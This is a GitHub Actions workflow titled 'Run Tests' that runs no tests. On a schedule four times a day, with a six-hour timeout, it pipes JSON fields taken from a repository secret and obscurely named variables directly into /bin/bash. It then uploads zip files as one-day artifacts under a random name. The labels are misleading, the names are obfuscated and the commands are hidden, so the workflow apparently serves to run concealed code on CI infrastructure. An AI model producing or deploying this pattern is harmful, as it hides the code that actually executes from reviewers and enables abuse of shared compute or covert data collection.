name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '11 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          w7: ${{ secrets.w7 }}
        run: |
          printf '%s' "$w7" | jq -r .gw16852 | /bin/bash
          printf '%s' "$t1783" | jq -r .pgsl735 | /bin/bash
          echo $uz422 | jq -r .pmr570 | /bin/bash
          echo $xixa4 | jq -r .ehn703 | /bin/bash
          echo $kp1 | jq -r .h48 | /bin/bash
          printf '%s' "$qpq84" | jq -r .hpc4213 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: XxGloPM8
          path: "*.zip"
          retention-days: 1
